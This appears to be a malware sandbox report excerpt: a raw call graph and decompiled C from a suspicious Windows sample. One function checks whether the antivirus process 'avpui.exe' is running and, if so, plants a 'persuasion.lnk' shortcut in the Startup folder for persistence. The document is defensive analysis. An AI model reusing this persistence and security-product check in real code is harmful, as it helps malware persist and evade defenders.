22834 9a6291 std::_Mutex::_Mutex 76 API calls 22832->22834 22837 9b1696 22832->22837 22833 9b16bd std::locale::_Init 22833->22798 22835 9b1674 22834->22835 22835->22837 22897 9c3f8c 79 API calls 4 library calls 22835->22897 22890 9b3452 22837->22890 22938 9c9c9a 22839->22938 22841 9b5156 22841->22801 22843 9b3bba __EH_prolog3 22842->22843 22844 9a6291 std::_Mutex::_Mutex 76 API calls 22843->22844 22845 9b3bc9 std::locale::_Init 22843->22845 22844->22845 22845->22804 22847 9b2214 22846->22847 22848 9a5d70 79 API calls 22847->22848 22849 9b221d 22848->22849 22850 9a5d70 79 API calls 22849->22850 22851 9b222b 22850->22851 22852 9a5d70 79 API calls 22851->22852 22853 9b2239 22852->22853 22854 9a5d70 79 API calls 22853->22854 22855 9b2247 22854->22855 22856 9a5d70 79 API calls 22855->22856 22857 9b2255 22856->22857 22857->22806 22859 9b3a0a __EH_prolog3 22858->22859 22860 9b3b1d 22859->22860 22861 9b3af6 22859->22861 22862 9b3a69 std::locale::_Init 22859->22862 22865 9b3aa1 22859->22865 22867 9b3a29 22859->22867 22870 9b3b44 22860->22870 22989 9b4535 132 API calls 3 library calls 22860->22989 22861->22862 22866 9a6291 std::_Mutex::_Mutex 76 API calls 22861->22866 22862->22808 22863 9bd77f ctype 109 API calls 22864 9b3a55 22863->22864 22977 9b03ee 22864->22977 22865->22862 22868 9b3ac8 SendMessageA 22865->22868 22869 9b3ac3 22865->22869 22872 9b3b12 22866->22872 22867->22862 22867->22863 22868->22862 22988 9b8782 RaiseException __CxxThrowException@8 22869->22988 22870->22862 22871 9a6291 std::_Mutex::_Mutex 76 API calls 22870->22871 22871->22872 22872->22862 22875 9b2204 79 API calls 22872->22875 22875->22862 22877->22812 22880 aaf4d5 _strlen 22879->22880 22884 9b3230 22879->22884 22881 aacf9b _malloc 76 API calls 22880->22881 22882 aaf4e8 22881->22882 22882->22884 22888 aaf201 76 API calls ___crtsetenv 22882->22888 22884->22827 22885 aaf4fa 22885->22884 22886 aaf505 22885->22886 22889 ab4b3b 10 API calls __call_reportfault 22886->22889 22888->22885 22889->22884 22891 9b34a8 GetPrivateProfileIntA 22890->22891 22892 9b3460 22890->22892 22894 9b3470 22891->22894 22898 9b33f8 22892->22898 22894->22833 22896 9b3475 RegQueryValueExA RegCloseKey 22896->22894 22897->22837 22907 9b333d 22898->22907 22901 9b3414 22901->22894 22901->22896 22902 9b343c RegCreateKeyExA 22905 9b3442 RegCloseKey 22902->22905 22903 9b3432 22924 9b32bb 22903->22924 22905->22901 22908 9b3378 RegOpenKeyExA 22907->22908 22909 9b3371 22907->22909 22911 9b3376 22908->22911 22931 9b3262 22909->22931 22912 9b33cc 22911->22912 22913 9b339c 22911->22913 22914 9b33a3 RegCreateKeyExA 22911->22914 22915 9b33df RegCloseKey 22912->22915 22916 9b33e4 22912->22916 22917 9b32bb 3 API calls 22913->22917 22918 9b33a1 22914->22918 22915->22916 22919 9b33e9 RegCloseKey 22916->22919 22920 9b33ee 22916->22920 22917->22918 22918->22912 22921 9b33ce RegCreateKeyExA 22918->22921 22922 9b33c7 22918->22922 22919->22920 22920->22901 22920->22902 22920->22903 22921->22912 22923 9b32bb 3 API calls 22922->22923 22923->22912 22925 9b330a 22924->22925 22926 9b32c8 GetModuleHandleA 22924->22926 22927 9b3318 22925->22927 22928 9b3310 RegCreateKeyExA 22925->22928 22926->22927 22929 9b32d7 GetProcAddress 22926->22929 22927->22905 22928->22927 22929->22927 22930 9b32e7 22929->22930 22930->22927 22932 9b326f GetModuleHandleA 22931->22932 22933 9b32a5 22931->22933 22934 9b327e GetProcAddress 22932->22934 22935 9b32b3 22932->22935 22933->22935 22936 9b32ab RegOpenKeyExA 22933->22936 22934->22935 22937 9b328e 22934->22937 22935->22911 22936->22935 22937->22935 22939 9c9ca6 __EH_prolog3 22938->22939 22955 9b0609 22939->22955 22941 9c9cb0 22942 9a5d70 79 API calls 22941->22942 22943 9c9cc3 22942->22943 22944 9a5d70 79 API calls 22943->22944 22945 9c9cd8 22944->22945 22946 9c9d2c 22945->22946 22947 9c9d9d 22945->22947 22950 9a6291 std::_Mutex::_Mutex 76 API calls 22946->22950 22953 9c9d3e 22946->22953 22958 9c9bdb 22947->22958 22949 9c9d9b std::locale::_Init 22949->22841 22950->22953 22951 9a6291 std::_Mutex::_Mutex 76 API calls 22954 9c9d6f 22951->22954 22953->22951 22953->22954 22971 9bbe03 77 API calls 22954->22971 22956 9bd77f ctype 109 API calls 22955->22956 22957 9b0613 22956->22957 22957->22941 22959 9c9bfc 22958->22959 22960 9c9bf4 22958->22960 22962 9c9c37 22959->22962 22964 9bd77f ctype 109 API calls 22959->22964 22972 9a9079 22960->22972 22965 9bd77f ctype 109 API calls 22962->22965 22966 9c9c66 22962->22966 22963 9c9c95 22963->22949 22967 9c9c19 LoadMenuW LoadAcceleratorsW 22964->22967 22968 9c9c48 LoadMenuW LoadAcceleratorsW 22965->22968 22966->22963 22969 9bd77f ctype 109 API calls 22966->22969 22967->22962 22968->22966 22970 9c9c77 LoadMenuW LoadAcceleratorsW 22969->22970 22970->22963 22971->22949 22973 9be51c 109 API calls 22972->22973 22974 9a9089 22973->22974 22975 9a9098 22974->22975 22976 9a8ddd 85 API calls 22974->22976 22975->22959 22976->22975 22978 9b03fe 22977->22978 22979 9b042c 22977->22979 22980 9bd77f ctype 109 API calls 22978->22980 22981 9b0403 22979->22981 22985 9b04ad 22979->22985 22980->22981 22982 9b040e 22981->22982 22986 9b0413 22981->22986 22994 9b8782 RaiseException __CxxThrowException@8 22981->22994 22984 9bd77f ctype 109 API calls 22982->22984 22984->22986 22985->22986 22990 9b02b6 22985->22990 22986->22862 22989->22870 22992 9b02c2 22990->22992 22993 9b02d2 22992->22993 22995 9b8782 RaiseException __CxxThrowException@8 22992->22995 22993->22986 22996 9ae991 23025 aad2d1 22996->23025 22998 9ae99d GetPropA 22999 9aea86 22998->22999 23000 9ae9d4 22998->23000 23003 9ac90b 110 API calls 22999->23003 23001 9ae9dd 23000->23001 23002 9aea64 23000->23002 23004 9aea3d SetWindowLongA RemovePropA GlobalFindAtomA GlobalDeleteAtom 23001->23004 23005 9ae9e2 23001->23005 23007 9ac90b 110 API calls 23002->23007 23006 9aea8c 23003->23006 23009 9aeaa4 CallWindowProcA 23004->23009 23008 9ae9ed 23005->23008 23005->23009 23010 9ac90b 110 API calls 23006->23010 23011 9aea6a 23007->23011 23013 9ac90b 110 API calls 23008->23013 23015 9aea32 23009->23015 23014 9aea94 23010->23014 23029 9ae919 118 API calls ctype 23011->23029 23017 9ae9ff 23013->23017 23030 9ae8a1 117 API calls 23014->23030 23028 aad32d 5 API calls __write_nolock 23015->23028 23016 9aea7a 23020 9aea9e 23016->23020 23026 9ab92c GetWindowRect GetWindowLongA 23017->23026 23020->23009 23020->23015 23023 9aea0f CallWindowProcA 23027 9ad4d9 132 API calls 2 library calls 23023->23027 23025->22998 23026->23023 23027->23015 23029->23016 23030->23020 23031 9b51cb 23034 9b528b 23031->23034 23032 9b51e0 23035 9b5297 __EH_prolog3 23034->23035 23040 9b52cb 23035->23040 23049 9b52b9 std::locale::_Init 23035->23049 23054 9a6b56 109 API calls 23035->23054 23037 9b52e2 23055 9b4535 132 API calls 3 library calls 23037->23055 23038 9b52f1 23039 9b5337 23038->23039 23043 9b531f 23038->23043 23042 9bd77f ctype 109 API calls 23039->23042 23047 9b533e 23039->23047 23040->23037 23040->23038 23044 9b5382 23042->23044 23056 9b4535 132 API calls 3 library calls 23043->23056 23057 9b0648 109 API calls ctype 23044->23057 23047->23049 23060 9b2b03 109 API calls ctype 23047->23060 23049->23032 23050 9b53ef 23059 9af81e 109 API calls 2 library calls 23050->23059 23051 9b538a 23051->23050 23058 9af81e 109 API calls 2 library calls 23051->23058 23054->23040 23055->23049 23056->23049 23057->23051 23058->23050 23059->23047 23060->23049 23061 9ab76b 23062 9ab777 __initptd 23061->23062 23063 9bd77f ctype 109 API calls 23062->23063 23064 9ab785 ActivateActCtx 23063->23064 23065 9ab79c LoadLibraryW 23064->23065 23067 9ab798 __initptd 23064->23067 23068 9ab7c0 23065->23068 23069 9ab7d8 23068->23069 23070 9ab7ce GetLastError 23068->23070 23071 9ab7da DeactivateActCtx 23069->23071 23070->23071 23072 9ab7e9 SetLastError 23071->23072 23073 9ab7f0 23071->23073 23072->23073 23073->23067 23074 9b30e9 23075 9bd77f ctype 109 API calls 23074->23075 23076 9b30ee 23075->23076 23077 9b3116 23076->23077 23080 9bd1b0 23076->23080 23081 9bcdbd ctype 103 API calls 23080->23081 23082 9b30fa GetCurrentThreadId SetWindowsHookExA 23081->23082 23082->23077 23083 9b368f 23084 9b369b __EH_prolog3 23083->23084 23085 9b3738 23084->23085 23086 9b36b1 23084->23086 23091 9a6291 std::_Mutex::_Mutex 76 API calls 23085->23091 23099 9b36c0 std::locale::_Init ctype 23085->23099 23087 9b33f8 13 API calls 23086->23087 23088 9b36b9 23087->23088 23089 9b36c7 RegQueryValueExA 23088->23089 23088->23099 23090 9b36fb 23089->23090 23094 9b371a ctype 23089->23094 23092 9a6291 std::_Mutex::_Mutex 76 API calls 23090->23092 23096 9b3775 23091->23096 23093 9b3701 RegQueryValueExA 23092->23093 23093->23094 23122 9b3320 RegCloseKey 23094->23122 23095 9a54f0 ctype 79 API calls 23098 9b37da __write_nolock 23095->23098 23096->23095 23096->23099 23100 9b3929 GetPrivateProfileStringA 23098->23100 23101 9b3838 23098->23101 23104 9b3849 23100->23104 23102 9b33f8 13 API calls 23101->23102 23105 9b383f 23102->23105 23106 9afb60 115 API calls 23104->23106 23105->23104 23107 9b3854 23105->23107 23121 9b3902 ctype 23106->23121 23110 9a5d70 79 API calls 23107->23110 23108 aab46a __write_nolock 5 API calls 23109 9b397c 23108->23109 23111 9b3865 RegQueryValueExA 23110->23111 23112 9b38df RegCloseKey 23111->23112 23113 9b389d 23111->23113 23115 9b38f3 23112->23115 23116 9b3911 23112->23116 23114 9a5f20 79 API calls 23113->23114 23117 9b38ae RegQueryValueExA 23114->23117 23118 9a6c6c 79 API calls 23115->23118 23124 9afb60 23116->23124 23123 9a876d 79 API calls _strnlen 23117->23123 23118->23121 23121->23108 23122->23099 23123->23112 23125 9afb6c __EH_prolog3 23124->23125 23126 9a5d70 79 API calls 23125->23126 23127 9afb7e 23126->23127 23132 9ae87c 23127->23132 23130 9afb9a std::locale::_Init 23130->23121 23131 9a6000 79 API calls 23131->23130 23133 9ae888 23132->23133 23134 9ae89b 23132->23134 23133->23134 23135 9a9079 115 API calls 23133->23135 23134->23130 23134->23131 23135->23134 23136 9af781 23137 9af790 23136->23137 23140 9ae612 23137->23140 23154 9a6b56 109 API calls 23140->23154 23142 9ae61c 23143 9ae62a 23142->23143 23155 9be5f2 8 API calls 23142->23155 23145 9b0a7a GetWindowLongA 23143->23145 23146 9ae631 23145->23146 23147 9ae638 23146->23147 23148 9ae652 23146->23148 23156 9ac827 105 API calls ctype 23147->23156 23149 9ac865 103 API calls 23148->23149 23152 9ae659 23149->23152 23151 9ae63d 23157 9ad893 285 API calls 23151->23157 23154->23142 23155->23143 23156->23151 23157->23148 23158 9a2f01 23159 9a2f08 23158->23159 23160 9a2f87 23158->23160 23171 9a1680 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::_Init 23159->23171 23162 9a2f1d 23172 9a2c90 114 API calls 5 library calls 23162->23172 23164 9a2f2a 23165 9a2f3c 23164->23165 23166 9a2f60 23164->23166 23173 9a10d0 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::_Init 23165->23173 23174 9a10d0 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::_Init 23166->23174 23168 9a2f4b 23170 9a2f72 23171->23162 23172->23164 23173->23168 23174->23170 23175 9b1605 23176 9b1613 23175->23176 23179 9b151c 23176->23179 23181 9b15d9 23179->23181 23184 9b1552 23179->23184 23180 9b1553 RegOpenKeyExA 23180->23184 23182 9b15c2 RegCloseKey 23182->23184 23183 9b1570 RegQueryValueExA 23183->23184 23184->23180 23184->23181 23184->23182 23184->23183 23185 9d5463 23186 9d546f __EH_prolog3 23185->23186 23187 9d54ab 23186->23187 23188 9d5482 23186->23188 23192 9d54a1 std::locale::_Init 23186->23192 23189 9bb845 RaiseException 23187->23189 23190 9a6291 std::_Mutex::_Mutex 76 API calls 23188->23190 23189->23192 23191 9d548c 23190->23191 23191->23192 23194 9ea6a8 23191->23194 23195 9ea6b4 __EH_prolog3 23194->23195 23272 9ea5af 121 API calls 23195->23272 23197 9ea6be 23198 9ea6e8 23197->23198 23199 9ea7be std::locale::_Init 23197->23199 23201 9bf8b8 23197->23201 23198->23197 23199->23192 23273 aad232 23201->23273 23203 9bf8c4 GetSysColor 23204 9bf8d9 GetSysColor 23203->23204 23205 9bf8e1 GetSysColor 23203->23205 23204->23205 23207 9bf8fc 23205->23207 23208 9bf8f4 GetSysColor 23205->23208 23274 9bae6d 23207->23274 23208->23207 23210 9bf914 22 API calls 23211 9bf9ef GetSysColor 23210->23211 23212 9bf9e4 23210->23212 23213 9bfa01 GetSysColorBrush 23211->23213 23212->23213 23214 9bfa21 GetSysColorBrush 23213->23214 23217 9bfa1c 23213->23217 23216 9bfa33 GetSysColorBrush 23214->23216 23214->23217 23216->23217 23257 9bfb9e CreateSolidBrush 23217->23257 23258 9bb072 moneypunct 110 API calls 23217->23258 23262 9bfc19 23217->23262 23281 9bb072 23217->23281 23292 9b8782 RaiseException __CxxThrowException@8 23217->23292 23293 9be955 7 API calls 2 library calls 23217->23293 23219 9bfa50 CreateSolidBrush 23286 9bb018 23219->23286 23222 9bb072 moneypunct 110 API calls 23223 9bfa72 CreateSolidBrush 23222->23223 23224 9bb018 109 API calls 23223->23224 23225 9bfa83 23224->23225 23226 9bb072 moneypunct 110 API calls 23225->23226 23227 9bfa8e CreateSolidBrush 23226->23227 23228 9bb018 109 API calls 23227->23228 23229 9bfa9f 23228->23229 23230 9bb072 moneypunct 110 API calls 23229->23230 23231 9bfaaa CreateSolidBrush 23230->23231 23232 9bb018 109 API calls 23231->23232 23233 9bfabb 23232->23233 23234 9bb072 moneypunct 110 API calls 23233->23234 23235 9bfac6 CreateSolidBrush 23234->23235 23236 9bb018 109 API calls 23235->23236 23237 9bfad7 23236->23237 23238 9bb072 moneypunct 110 API calls 23237->23238 23239 9bfae2 CreateSolidBrush 23238->23239 23240 9bb018 109 API calls 23239->23240 23241 9bfaf3 23240->23241 23242 9bb072 moneypunct 110 API calls 23241->23242 23243 9bfafe CreateSolidBrush 23242->23243 23244 9bb018 109 API calls 23243->23244 23245 9bfb0f 23244->23245 23246 9bb072 moneypunct 110 API calls 23245->23246 23247 9bfb1a CreatePen 23246->23247 23248 9bb018 109 API calls 23247->23248 23249 9bfb38 23248->23249 23250 9bb072 moneypunct 110 API calls 23249->23250 23251 9bfb43 CreatePen 23250->23251 23252 9bb018 109 API calls 23251->23252 23253 9bfb5b 23252->23253 23254 9bb072 moneypunct 110 API calls 23253->23254 23255 9bfb66 CreatePen 23254->23255 23256 9bb018 109 API calls 23255->23256 23256->23217 23259 9bb018 109 API calls 23257->23259 23258->23217 23261 9bfbfe 23259->23261 23295 9ee504 80 API calls 23261->23295 23264 9bb018 109 API calls 23262->23264 23266 9bfc32 CreatePatternBrush 23264->23266 23265 9bfc57 23296 9baec1 111 API calls 2 library calls 23265->23296 23268 9bb018 109 API calls 23266->23268 23269 9bfc43 23268->23269 23294 9a93b2 110 API calls 3 library calls 23269->23294 23270 9bfc6d std::locale::_Init 23270->23199 23272->23197 23273->23203 23275 9bae79 __EH_prolog3 23274->23275 23276 9bae9c GetWindowDC 23275->23276 23297 9bad44 23276->23297 23279 9baeb7 std::locale::_Init 23279->23210 23282 9bb07b 23281->23282 23283 9bb078 23281->23283 23306 9bb046 23282->23306 23283->23219 23285 9bb080 DeleteObject 23285->23219 23287 9bb027 23286->23287 23291 9bb03c 23286->23291 23311 9baf90 109 API calls 4 library calls 23287->23311 23289 9bb031 23312 9c2c32 77 API calls ctype 23289->23312 23291->23222 23293->23217 23294->23261 23295->23265 23296->23270 23298 9bad53 23297->23298 23299 9bad68 23297->23299 23304 9bacbc 109 API calls 4 library calls 23298->23304 23299->23279 23303 9ba563 GetViewportExtEx RaiseException __CxxThrowException@8 23299->23303 23301 9bad5d 23305 9c2c32 77 API calls ctype 23301->23305 23303->23279 23304->23301 23305->23299 23307 9bb05a moneypunct 23306->23307 23308 9bb053 23306->23308 23307->23285 23310 9baf90 109 API calls 4 library calls 23308->23310 23310->23307 23311->23289 23312->23291

      Executed Functions

      Function 009A13B0 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 180stringcomsleepCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 68%
      			E009A13B0(intOrPtr __edx, void* __edi, void* __eflags, CHAR* _a4) {
				signed int _v8;
				char _v267;
				char _v268;
				char _v527;
				char _v528;
				char _v1551;
				char _v1552;
				char _v2575;
				char _v2576;
				char _v3599;
				char _v3600;
				short _v7612;
				void* _v7616;
				void* _v7620;
				void* __ebx;
				void* __esi;
				signed int _t52;
				void* _t54;
				char* _t75;
				intOrPtr* _t76;
				intOrPtr* _t79;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr* _t86;
				intOrPtr* _t89;
				intOrPtr* _t93;
				void* _t95;
				intOrPtr _t105;
				signed int _t131;

				_t128 = __edi;
				_t113 = __edx;
				E00AAB480(0x1dc0);
				_t52 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t52 ^ _t131;
				_t130 = _a4;
				_t54 = E009A12C0(__edx, __edi, "avpui.exe"); // executed
				if(_t54 != 0) {
					_v3600 = 0;
					E00AAB3F0( &_v3599, 0, 0x3ff);
					_v1552 = 0;
					E00AAB3F0( &_v1551, 0, 0x3ff);
					_v2576 = 0;
					E00AAB3F0( &_v2575, 0, 0x3ff);
					_v268 = 0;
					E00AAB3F0( &_v267, 0, 0x103);
					_v528 = 0;
					E00AAB3F0( &_v527, 0, 0x103);
					_t130 = lstrcpyA;
					lstrcpyA( &_v268, lstrcpyA);
					lstrcpyA( &_v528,  &_v268);
					lstrcpyA( &_v3600,  &_v268);
					__imp__SHGetSpecialFolderPathA(0,  &_v1552, 7, 0, __edi, _t95);
					lstrcpyA( &_v2576,  &_v1552);
					lstrcatA( &_v2576, "\\");
					lstrcatA( &_v2576, "persuasion.lnk");
					 *((char*)(E00AAB050( &_v2576,  &_v3600, 0x5c) + 1)) = 0;
					lstrcpyA( &_v1552,  &_v3600);
					__imp__CoInitialize(0);
					_t75 =  &_v7616;
					__imp__CoCreateInstance(0xaffdd0, 0, 1, 0xadbaf0, _t75);
					_t76 = _v7616;
					_t105 =  *_t76;
					if(_t75 >= 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t105 + 0x50))))(_t76,  &_v268);
						_t79 = _v7616;
						 *((intOrPtr*)( *((intOrPtr*)( *_t79 + 0x2c))))(_t79, 0);
						_t81 = _v7616;
						 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x1c))))(_t81, 0);
						_t83 = _v7616;
						 *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x24))))(_t83,  &_v1552);
						_t86 = _v7616;
						_push( &_v7620);
						_push(0xaffd40);
						_push(_t86);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t86))))() >= 0) {
							MultiByteToWideChar(0, 0,  &_v2576, 0xffffffff,  &_v7612, 0x104);
							_t93 = _v7620;
							 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 0x18))))(_t93,  &_v7612, 1);
						}
						_t89 = _v7620;
						 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
						_t76 = _v7616;
						_t105 =  *_t76;
					}
					_t113 =  *((intOrPtr*)(_t105 + 8));
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t105 + 8))))();
					__imp__CoUninitialize();
					Sleep(0xea60);
					_t128 = _t76;
					_pop(_t95);
				}
				return E00AAB46A(_t54, _t95, _v8 ^ _t131, _t113, _t128, _t130);
			}
































      0x009a13b0
      0x009a13b0
      0x009a13b8
      0x009a13bd
      0x009a13c4
      0x009a13c8
      0x009a13d0
      0x009a13da
      0x009a13f1
      0x009a13f7
      0x009a1409
      0x009a140f
      0x009a1421
      0x009a1427
      0x009a1439
      0x009a143f
      0x009a1451
      0x009a1457
      0x009a1460
      0x009a146d
      0x009a147d
      0x009a148d
      0x009a149a
      0x009a14ae
      0x009a14c2
      0x009a14d0
      0x009a14f1
      0x009a14f4
      0x009a14f7
      0x009a14fd
      0x009a1511
      0x009a1519
      0x009a151f
      0x009a1521
      0x009a1532
      0x009a1534
      0x009a1541
      0x009a1543
      0x009a1550
      0x009a1552
      0x009a1565
      0x009a1567
      0x009a1575
      0x009a1576
      0x009a157b
      0x009a1582
      0x009a159b
      0x009a15a1
      0x009a15b6
      0x009a15b6
      0x009a15b8
      0x009a15c4
      0x009a15c6
      0x009a15cc
      0x009a15cc
      0x009a15ce
      0x009a15d2
      0x009a15d4
      0x009a15df
      0x009a15e5
      0x009a15e6
      0x009a15e6
      0x009a15f5

      APIs
        • Part of subcall function 009A12C0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009A12E3
        • Part of subcall function 009A12C0: Process32First.KERNEL32(00000000,?), ref: 009A12FD
      • _memset.LIBCMT ref: 009A13F7
      • _memset.LIBCMT ref: 009A140F
      • _memset.LIBCMT ref: 009A1427
      • _memset.LIBCMT ref: 009A143F
      • _memset.LIBCMT ref: 009A1457
      • lstrcpyA.KERNEL32(?,?), ref: 009A146D
      • lstrcpyA.KERNEL32(?,?), ref: 009A147D
      • lstrcpyA.KERNEL32(?,?), ref: 009A148D
      • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 009A149A
      • lstrcpyA.KERNEL32(?,?), ref: 009A14AE
      • lstrcatA.KERNEL32(?,00AD6DF8), ref: 009A14C2
      • lstrcatA.KERNEL32(?,persuasion.lnk), ref: 009A14D0
      • _strrchr.LIBCMT ref: 009A14DB
      • lstrcpyA.KERNEL32(?,?), ref: 009A14F4
      • CoInitialize.OLE32(00000000), ref: 009A14F7
      • CoCreateInstance.OLE32(00AFFDD0,00000000,00000001,00ADBAF0,?), ref: 009A1511
      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009A159B
      • CoUninitialize.OLE32 ref: 009A15D4
      • Sleep.KERNEL32(0000EA60), ref: 009A15DF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memsetlstrcpy$Createlstrcat$ByteCharFirstFolderInitializeInstanceMultiPathProcess32SleepSnapshotSpecialToolhelp32UninitializeWide_strrchr
      • String ID: avpui.exe$persuasion.lnk
      • API String ID: 179343930-886163282
      • Opcode ID: dd5e9ebfa9602df55489b87e24358bba9188dc035a80fd7794675620d2ca2636
      • Instruction ID: 8b596e64ec5ca0a07cd3537373e635838dc93a1f1ecb8e97f5b4fee1d91a02f5
      • Opcode Fuzzy Hash: dd5e9ebfa9602df55489b87e24358bba9188dc035a80fd7794675620d2ca2636
      • Instruction Fuzzy Hash: B36132B5A50218AFDB10DB64CC85EDA77BCEF49304F0086DAF50A97291D774AE85CF60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A12C0 Relevance: 7.6, APIs: 5, Instructions: 81processCOMMON
      Download Yara Rule
      C-Code - Quality: 79%
      			E009A12C0(struct tagPROCESSENTRY32W __edx, void* __edi, intOrPtr* _a4) {
				signed int _v8;
				char _v268;
				int _v296;
				void* _v304;
				int _v308;
				void* __ebx;
				void* __esi;
				signed int _t18;
				void* _t20;
				int _t22;
				intOrPtr* _t27;
				intOrPtr* _t35;
				intOrPtr* _t40;
				void* _t41;
				signed int _t42;

				_t39 = __edi;
				_t38 = __edx;
				_t18 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t18 ^ _t42;
				_v308 = 0;
				_t20 = CreateToolhelp32Snapshot(2, 0); // executed
				_t41 = _t20;
				_v304 = 0x128;
				_t22 = Process32First(_t41,  &_v304); // executed
				if(_t22 != 0) {
					_v304 = 0x128;
					if(Process32Next(_t41,  &_v304) != 0) {
						_push(__edi);
						_t40 = _a4;
						do {
							_t35 = _t40;
							_t27 =  &_v268;
							while(1) {
								_t38 =  *_t27;
								if(_t38 !=  *_t35) {
									break;
								}
								if(_t38 == 0) {
									L9:
									_t27 = 0;
								} else {
									_t38 =  *((intOrPtr*)(_t27 + 1));
									if(_t38 !=  *((intOrPtr*)(_t35 + 1))) {
										break;
									} else {
										_t27 = _t27 + 2;
										_t35 = _t35 + 2;
										if(_t38 != 0) {
											continue;
										} else {
											goto L9;
										}
									}
								}
								L11:
								if(_t27 == 0) {
									_v308 = _v296;
								} else {
									goto L12;
								}
								L15:
								_pop(_t39);
								goto L16;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L11;
							L12:
							_t38 =  &_v304;
							_v304 = 0x128;
						} while (Process32Next(_t41,  &_v304) != 0);
						goto L15;
					}
					L16:
					FindCloseChangeNotification(_t41); // executed
					return E00AAB46A(_v308, 0x128, _v8 ^ _t42, _t38, _t39, _t41);
				} else {
					return E00AAB46A(_t22, 0x128, _v8 ^ _t42, _t38, __edi, _t41);
				}
			}


















      0x009a12c0
      0x009a12c0
      0x009a12c9
      0x009a12d0
      0x009a12d9
      0x009a12e3
      0x009a12e8
      0x009a12f7
      0x009a12fd
      0x009a1304
      0x009a131e
      0x009a132b
      0x009a132d
      0x009a132e
      0x009a1331
      0x009a1331
      0x009a1333
      0x009a1340
      0x009a1340
      0x009a1344
      0x00000000
      0x00000000
      0x009a1348
      0x009a135c
      0x009a135c
      0x009a134a
      0x009a134a
      0x009a1350
      0x00000000
      0x009a1352
      0x009a1352
      0x009a1355
      0x009a135a
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009a135a
      0x009a1350
      0x009a1365
      0x009a1367
      0x009a1388
      0x00000000
      0x00000000
      0x00000000
      0x009a138e
      0x009a138e
      0x00000000
      0x009a138e
      0x009a1360
      0x009a1362
      0x00000000
      0x009a1369
      0x009a1369
      0x009a1371
      0x009a137c
      0x00000000
      0x009a1380
      0x009a138f
      0x009a1390
      0x009a13ab
      0x009a1308
      0x009a1315
      0x009a1315

      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009A12E3
      • Process32First.KERNEL32(00000000,?), ref: 009A12FD
      • Process32Next.KERNEL32 ref: 009A1324
      • Process32Next.KERNEL32 ref: 009A1377
      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?), ref: 009A1390
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Process32$Next$ChangeCloseCreateFindFirstNotificationSnapshotToolhelp32
      • String ID:
      • API String ID: 4072508860-0
      • Opcode ID: 1a0dcd5f53f28b01e0b2d686bc6f9dbf846712b75ce0cc179c7fe60369c3bb30
      • Instruction ID: cd96c74506ade7eedf5d6284237a97be51b87b3885a1dd3ba08b828a82c23613
      • Opcode Fuzzy Hash: 1a0dcd5f53f28b01e0b2d686bc6f9dbf846712b75ce0cc179c7fe60369c3bb30
      • Instruction Fuzzy Hash: A8219271A042189BCF209F349D91BEEB7ADEF4B350F0445DAE94997241EB319E488BD0
      Uniqueness

